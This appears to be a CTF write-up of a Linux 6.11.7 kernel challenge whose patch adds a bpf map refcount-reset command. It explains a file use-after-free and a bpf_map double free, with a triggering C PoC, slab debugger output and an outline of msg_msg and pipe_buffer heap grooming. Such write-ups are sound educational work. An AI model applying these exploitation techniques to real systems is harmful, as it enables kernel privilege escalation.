强网拟态 (Qiangwang Mimic) 2024 Finals: eBeepf

Qanux

2025-01-15

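Preface

The 强网拟态 finals ended a while ago. I am writing this post because I realized that during the competition we apparently solved this challenge in an unintended way, and that the unintended route makes the challenge much easier, so I think our approach is worth sharing.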

Information gathering

Yet another Linux kernel challenge, so there is not much to say here. The kernel version is 6.11.7:

                           @@@@
                           @@@
                          @@@
                        @@@@@
             @@@     @@@@@@@@@@@    @@@@@
       @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
      @@+            +@@@@@@@@@@@@@
      @%  +%%%@@@@@%*= #@@@@@@@@@@@
      @@@           -=%@@@@@@@@@@@@
       @@@%        +#@@@@@@@**%@@@@
         @@@@@@@@@@%=   #@++%  #@@
          @@@:*@@@%-   +@*  *#  #@@
          @@#:-#@@@@%==#@=  -**  #@@
          @@@-:-+@@@@@@@@+   %#=  @@
           @@@=:::=*@@@@@@##+=#+  %@@
            @@@%=::::::-#@@=  ###%@@@
            @@@@@@@@@@@@@@@@@ #   @@@
            @@@   @@@@      @@@@@@@@

Boot took 1.99 seconds

/ $ uname -r
6.11.7

The attachment contains a bee.patch:

diff -r linux-6.11.7/include/uapi/linux/bpf.h linux-6.11.7.patched/include/uapi/linux/bpf.h
960a961
> 	BPF_MAP_RESET_REF,
diff -r linux-6.11.7/kernel/bpf/syscall.c linux-6.11.7.patched/kernel/bpf/syscall.c
5690a5691,5711
> static int bpf_map_do_reset_ref(union bpf_attr *attr)
> {
>       int ufd = attr->map_fd;
>       struct bpf_map *map;
>       struct fd f;
>       f = fdget(ufd);
>       map = __bpf_map_get(f);
>       if (IS_ERR(map)) {
>               fdput(f);
>               return PTR_ERR(map);
>       }
>       if (map->max_entries > 60) {
>               fdput(f);
>               return -EINVAL;
>       }
>       atomic64_set(&map->refcnt, 1);
>       atomic64_set(&map->sleepable_refcnt, 0);
>       fdput(f);
>       return 0;
> }
> 
5825a5847,5849
> 		break;
> 	case BPF_MAP_RESET_REF:
> 		err = bpf_map_do_reset_ref(&attr);

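The challenge author added a new command to the kernel's bpf subsystem, so the vulnerability should be somewhere in here.

Vulnerability analysis and exploitation

The fd struct is defined as follows: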
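To reach the new command from user space, one can go through the raw bpf(2) syscall. The sketch below is a guess at what the `trigger()` helper used by the PoC later in this post might look like. The helper name `trigger_reset_ref` and the command number 37 are assumptions: 37 is where an enumerator appended after BPF_TOKEN_CREATE would land in a stock 6.11 header, but the patched header is authoritative.

```c
#include <assert.h>
#include <linux/bpf.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* ASSUMPTION: value of the new enumerator in the patched enum bpf_cmd. */
#define BPF_MAP_RESET_REF 37

/*
 * Hypothetical helper: ask the kernel to run the patched command on map_fd.
 * Returns 0 on success, or -1 with errno set on failure.
 */
int trigger_reset_ref(int map_fd)
{
	union bpf_attr attr;

	/* The kernel rejects attrs with non-zero unused bytes, so clear it all. */
	memset(&attr, 0, sizeof(attr));
	attr.map_fd = map_fd;	/* the patch reads attr->map_fd */

	return (int)syscall(__NR_bpf, BPF_MAP_RESET_REF, &attr, sizeof(attr));
}
```

On a kernel without the patch the call simply fails, so the helper is harmless to compile and run elsewhere; on the challenge kernel it would be called as `trigger_reset_ref(inner_map)`.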

struct fd {
	struct file *file;
	unsigned int flags;
};

It is simply a pointer to a file struct plus a flags field.

fdget goes through several layers of calls and eventually reaches __fget_light:

static inline struct fd fdget(unsigned int fd)
{
	return __to_fd(__fdget(fd));
}

fdget calls __fdget:

unsigned long __fdget(unsigned int fd)
{
	return __fget_light(fd, FMODE_PATH);
}

__fdget calls __fget_light:

/*
 * Lightweight file lookup - no refcnt increment if fd table isn't shared.
 *
 * You can use this instead of fget if you satisfy all of the following
 * conditions:
 * 1) You must call fput_light before exiting the syscall and returning control
 *    to userspace (i.e. you cannot remember the returned struct file * after
 *    returning to userspace).
 * 2) You must not call filp_close on the returned struct file * in between
 *    calls to fget_light and fput_light.
 * 3) You must not clone the current task in between the calls to fget_light
 *    and fput_light.
 *
 * The fput_needed flag returned by fget_light should be passed to the
 * corresponding fput_light.
 */
static unsigned long __fget_light(unsigned int fd, fmode_t mask)
{
	struct files_struct *files = current->files;
	struct file *file;

	/*
	 * If another thread is concurrently calling close_fd() followed
	 * by put_files_struct(), we must not observe the old table
	 * entry combined with the new refcount - otherwise we could
	 * return a file that is concurrently being freed.
	 *
	 * atomic_read_acquire() pairs with atomic_dec_and_test() in
	 * put_files_struct().
	 */
	if (likely(atomic_read_acquire(&files->count) == 1)) {
		file = files_lookup_fd_raw(files, fd);
		if (!file || unlikely(file->f_mode & mask))
			return 0;
		return (unsigned long)file;
	} else {
		file = __fget_files(files, fd, mask);
		if (!file)
			return 0;
		return FDPUT_FPUT | (unsigned long)file;
	}
}

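Look closely at __fget_light. It looks up the struct file that corresponds to a file descriptor (fd), but under the restrictions listed in its comment, which is what makes it lighter than the regular fget. In detail:
The function first takes the current process's file descriptor table via files = current->files. If the table's reference count is 1 (atomic_read_acquire(&files->count) == 1), the table is not shared with any other thread, so the lightweight path is safe: it calls files_lookup_fd_raw to fetch the struct file directly and does not touch the file's reference count.

If the reference count is not 1, another thread may be operating on the table, so the heavier lookup is needed and __fget_files is called. Readers interested in the details can read its source; in the normal case it returns the struct file that fd refers to and increments its f_count. The return value is then tagged with FDPUT_FPUT, which ends up in the flags field of the fd struct.

Next comes fdput. Judging by the name, it should behave much like fput. Its source is: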

static inline void fdput(struct fd fd)
{
	if (fd.flags & FDPUT_FPUT)
		fput(fd.file);
}

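It checks whether FDPUT_FPUT is set in the flags of the fd struct and, if so, calls fput to decrement the f_count of the file struct. From the analysis above, FDPUT_FPUT is only set when __fget_light runs in a multithreaded process, that is, one whose fd table is shared.

__bpf_map_get is the important one here. Its source is: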
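The way the flag travels from __fget_light to fdput is easy to miss: it is packed into the low bits of the returned pointer and split out again by __to_fd. The following user-space toy model illustrates that packing. All `toy_` names are made up for illustration, and the masking with 3 reflects my reading of __to_fd in 6.11 rather than code quoted in this post.

```c
#include <assert.h>
#include <stdint.h>

#define FDPUT_FPUT 1u	/* bit 0 of the tagged value: "fput() is needed" */

struct toy_file { long f_count; };	/* stand-in for struct file */
struct toy_fd   { struct toy_file *file; unsigned int flags; };

/* Model of __fget_light(): take a reference only if the fd table is shared. */
uintptr_t toy_fget_light(struct toy_file *f, int table_shared)
{
	if (!table_shared)
		return (uintptr_t)f;		/* borrowed, f_count untouched */
	f->f_count++;				/* shared table: real reference */
	return FDPUT_FPUT | (uintptr_t)f;	/* pointer is aligned, bit 0 is free */
}

/* Model of __to_fd(): low two bits are flags, the rest is the pointer. */
struct toy_fd toy_to_fd(uintptr_t v)
{
	struct toy_fd fd = { (struct toy_file *)(v & ~(uintptr_t)3),
			     (unsigned int)(v & 3) };
	return fd;
}

/* Model of fdput(): drop the reference only if one was taken. */
void toy_fdput(struct toy_fd fd)
{
	if (fd.flags & FDPUT_FPUT)
		fd.file->f_count--;
}
```

In this model a matched get/put pair leaves f_count unchanged in both modes; only the shared-table mode ever touches the counter.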

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
	if (!f.file)
		return ERR_PTR(-EBADF);
	if (f.file->f_op != &bpf_map_fops) {
		fdput(f);
		return ERR_PTR(-EINVAL);
	}

	return f.file->private_data;
}

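__bpf_map_get obtains the eBPF map behind an fd. It takes the fd struct of what should be an eBPF map file descriptor. If the descriptor we pass in refers to an ordinary file rather than an eBPF map, __bpf_map_get calls fdput on the fd struct and returns -EINVAL. This is where the problem lies. Look at this part of the patch again: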

map = __bpf_map_get(f);
if (IS_ERR(map)) {
        fdput(f);
        return PTR_ERR(map);
}

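When __bpf_map_get returns an error, the patch calls fdput on f a second time. In other words, if we pass the descriptor of an ordinary file instead of an eBPF map, the new bpf command runs fdput twice on the same fd struct. As analyzed above, fdput calls fput whenever FDPUT_FPUT is set, so the file loses one reference more than fdget took, which gives us a file UAF.
So for this challenge we only need to create one extra thread and pass the descriptor of an ordinary file to the new bpf command to get a file UAF. With a file UAF there are many ways to proceed; at the time we used DirtyCred to obtain a privileged file write, which I will not go over again here.

Note that from Linux kernel 6.12 onward this part of the code changed considerably. For example, __bpf_map_get became: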
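The reference accounting on the error path can be checked with a small user-space model. This is only a sketch: the `toy_` functions are hypothetical stand-ins that mirror the control flow of fdget, the 6.11 __bpf_map_get and the patched bpf_map_do_reset_ref, not kernel code.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_file { int f_count; bool is_bpf_map; };
struct toy_fd   { struct toy_file *file; bool need_fput; };

/* fdget(): takes a reference only when the fd table is shared. */
static struct toy_fd toy_fdget(struct toy_file *f, bool table_shared)
{
	struct toy_fd fd = { f, table_shared };
	if (f != NULL && table_shared)
		f->f_count++;
	return fd;
}

static void toy_fdput(struct toy_fd fd)
{
	if (fd.need_fput)
		fd.file->f_count--;
}

/* 6.11 __bpf_map_get(): already releases the fd when it is not a map. */
static int toy_bpf_map_get(struct toy_fd f)
{
	if (f.file == NULL)
		return -EBADF;
	if (!f.file->is_bpf_map) {
		toy_fdput(f);		/* first put */
		return -EINVAL;
	}
	return 0;
}

/* Error handling as written in the patch. */
int toy_reset_ref(struct toy_file *file, bool table_shared)
{
	struct toy_fd f = toy_fdget(file, table_shared);
	int err = toy_bpf_map_get(f);

	if (err) {
		toy_fdput(f);		/* second put: one reference too many */
		return err;
	}
	toy_fdput(f);
	return 0;
}
```

With an unshared table both puts are no-ops, which is why the extra thread matters. With a shared table, a regular file that starts at f_count 1 ends at 0 while the fd table still points at it.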

static inline struct bpf_map *__bpf_map_get(struct fd f)
{
	if (fd_empty(f))
		return ERR_PTR(-EBADF);
	if (unlikely(fd_file(f)->f_op != &bpf_map_fops))
		return ERR_PTR(-EINVAL);
	return fd_file(f)->private_data;
}

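When the descriptor passed in is not an eBPF map, it no longer calls fdput.

The intended vulnerability of this challenge is most likely the part at the very bottom of the patch: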

atomic64_set(&map->refcnt, 1);
atomic64_set(&map->sleepable_refcnt, 0);

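This manually resets the refcnt field of the bpf_map struct to 1 (and sleepable_refcnt to 0). When we close() the fd of an eBPF map, the kernel decrements the refcnt of the corresponding bpf_map and frees the struct if the count reaches 0. If we first raise refcnt above 1 and then invoke the new command, the counter no longer matches the number of real references, and the same bpf_map struct can be freed more than once. A double-free PoC looks like this: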

int key = 0;
prctl(PR_SET_NAME, "Qanux");
int inner_map = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, 4, 10);
if (inner_map < 0) err_exit("Failed to bpf_map_create for inner_map");
printf("[+] inner_map: %d\n", inner_map);

int outer_map = create_bpf_array_of_map(inner_map, 4, 4, 10);
if (outer_map < 0) err_exit("Failed to bpf_map_create for outer_map");
printf("[+] outer_map: %d\n", outer_map);

puts("[+] set inner_map.ref = 2");
if (bpf_map_update_elem(outer_map, &key, &inner_map, BPF_ANY) < 0)
    err_exit("Failed to bpf_map_update_elem");

puts("[+] BUG set inner_map.ref = 1");
trigger(inner_map);

puts("[+] close outer_map to free inner_map's bpf_map object");
// first free of bpf_map
close(outer_map);

puts("[+] try to close inner_map");
// second free of bpf_map
trigger(inner_map);
close(inner_map);
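The counter arithmetic behind the PoC can be replayed in a few lines of user-space C. This is a toy model with hypothetical `toy_` names: it tracks only the order of increments, resets and puts, and ignores that the real kernel tears maps down asynchronously.

```c
#include <assert.h>

struct toy_map {
	long refcnt;		/* stand-in for map->refcnt */
	int  times_freed;	/* how often the free path ran */
};

void toy_map_inc(struct toy_map *m)
{
	m->refcnt++;
}

/* Like a normal put: free when the count drops to zero. */
void toy_map_put(struct toy_map *m)
{
	if (--m->refcnt == 0)
		m->times_freed++;
}

/* What the patched command does to the counter. */
void toy_map_reset_ref(struct toy_map *m)
{
	m->refcnt = 1;
}

/* Replays the PoC; with_reset = 0 shows the normal lifetime for contrast. */
int toy_poc_frees(int with_reset)
{
	struct toy_map inner = { .refcnt = 1, .times_freed = 0 };

	toy_map_inc(&inner);			/* stored in outer_map: 2 */
	if (with_reset)
		toy_map_reset_ref(&inner);	/* forced back to 1 */
	toy_map_put(&inner);			/* close(outer_map) */
	if (with_reset)
		toy_map_reset_ref(&inner);	/* freed object, count 1 again */
	toy_map_put(&inner);			/* close(inner_map) */
	return inner.times_freed;
}
```

Without the reset the map is freed exactly once, after both references are gone; with the two resets the free path runs twice on the same object.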

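At this point the double free is plainly visible in gdb. I used the bata24/gef plugin here, which supports many commands for debugging the kernel and various kinds of heaps, although I am not a big fan of its command syntax and UI.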

gef> slub-dump kmalloc-512 -n -q
slab_caches @ 0xffffffffa9562c80

  kmem_cache: 0xffff987801042a00
    name: kmalloc-512
    flags: 0x10008 (SLAB_STORE_USER)
    object size: 0x200 (chunk size: 0x200)
    offset (next pointer in chunk): 0x100
    red_left_pad: 0x0
    kmem_cache_cpu (cpu0): 0xffff98780f632c20
      active page: 0xffffec9640078640
        virtual address: 0xffff987801e19000
        num pages: 1
        in-use: 6/8
        frozen: 1
        layout:   0x000 0xffff987801e19000 (next: 0xffff987801e19000: Corrupted (Loop detected))
                  0x001 0xffff987801e19200 (in-use)
                  0x002 0xffff987801e19400 (in-use)
                  0x003 0xffff987801e19600 (in-use)
                  0x004 0xffff987801e19800 (in-use)
                  0x005 0xffff987801e19a00 (in-use)
                  0x006 0xffff987801e19c00 (in-use)
                  0x007 0xffff987801e19e00 (in-use)
        freelist (fast path):
                  0x000 0xffff987801e19000
                        0xffff987801e19000: Corrupted (Loop detected)
        freelist (slow path): (none)
    next: 0xffff987801042900
gef>

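Because this kernel was built without CONFIG_SLAB_FREELIST_HARDENED, the same object can be freed twice in a row. With that option enabled, one could allocate a 0x200-byte pipe_buffer array beforehand, free that array after the first free of the bpf_map, and then free the bpf_map a second time.

In this environment the freelist next pointer of kmalloc-512 sits at offset 0x100. We can first use a msg (msg_msg) to occupy the double-freed chunk (called the victim obj below) and overwrite the low bits of the next pointer so that it points to victim obj + 0x30 (which keeps the msg header intact). We then allocate a pipe_buffer that lands on the victim obj again (this pipe_buffer starts at victim obj + 0x30), after which the pipe_buffer can be modified through the msg. Many attacks follow from here, such as changing the pipe_buffer flags for a dirty pipe attack or changing its page pointer to build a page UAF; I will not go into them here either.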
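The effect of the partial overwrite on the freelist can be reproduced with a user-space toy allocator. This is a sketch under assumptions: the object size and pointer offset are taken from the dump above, the 0x30 header size is assumed to be sizeof(struct msg_msg) on x86-64, the addresses are fake, and the freelist pointer is stored unobfuscated, as it would be without CONFIG_SLAB_FREELIST_HARDENED. It also assumes a little-endian host.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define OBJ_SIZE  0x200u	/* kmalloc-512 object size (from the dump) */
#define FP_OFFSET 0x100u	/* freelist pointer offset (from the dump) */
#define MSG_HDR   0x30u		/* ASSUMPTION: sizeof(struct msg_msg) */
#define FAKE_BASE 0xffff987801e19000ull	/* made-up victim address */

/* Toy cache: backing memory for two objects plus the freelist head. */
struct toy_cache {
	uint8_t  mem[2 * OBJ_SIZE];
	uint64_t head;		/* fake address of the first free object */
};

static uint8_t *toy_ptr(struct toy_cache *c, uint64_t addr)
{
	return &c->mem[addr - FAKE_BASE];
}

/* Free: store the old head inside the object, then make it the new head. */
void toy_free(struct toy_cache *c, uint64_t obj)
{
	memcpy(toy_ptr(c, obj + FP_OFFSET), &c->head, sizeof(c->head));
	c->head = obj;
}

/* Alloc: pop the head and follow the pointer stored inside it. */
uint64_t toy_alloc(struct toy_cache *c)
{
	uint64_t obj = c->head;

	memcpy(&c->head, toy_ptr(c, obj + FP_OFFSET), sizeof(c->head));
	return obj;
}

/* Returns how far the final allocation is shifted from the victim. */
uint64_t toy_overlap_offset(void)
{
	struct toy_cache c;
	uint64_t victim = FAKE_BASE;

	memset(&c, 0, sizeof(c));
	toy_free(&c, victim);
	toy_free(&c, victim);		/* double free: victim -> victim */

	uint64_t msg = toy_alloc(&c);	/* the msg lands on the victim */
	/* Overwrite only the low byte of the stored next pointer. */
	*toy_ptr(&c, msg + FP_OFFSET) = MSG_HDR;

	toy_alloc(&c);			/* hands out the victim once more */
	return toy_alloc(&c) - victim;	/* the shifted allocation */
}
```

In this model the freelist pointer sits FP_OFFSET - MSG_HDR = 0xd0 bytes into the message body, so a body that ends one byte past that offset touches only the low byte. The model also shows one intermediate allocation returning the victim itself before the shifted one is handed out; how the real exploit fills that slot is not covered here.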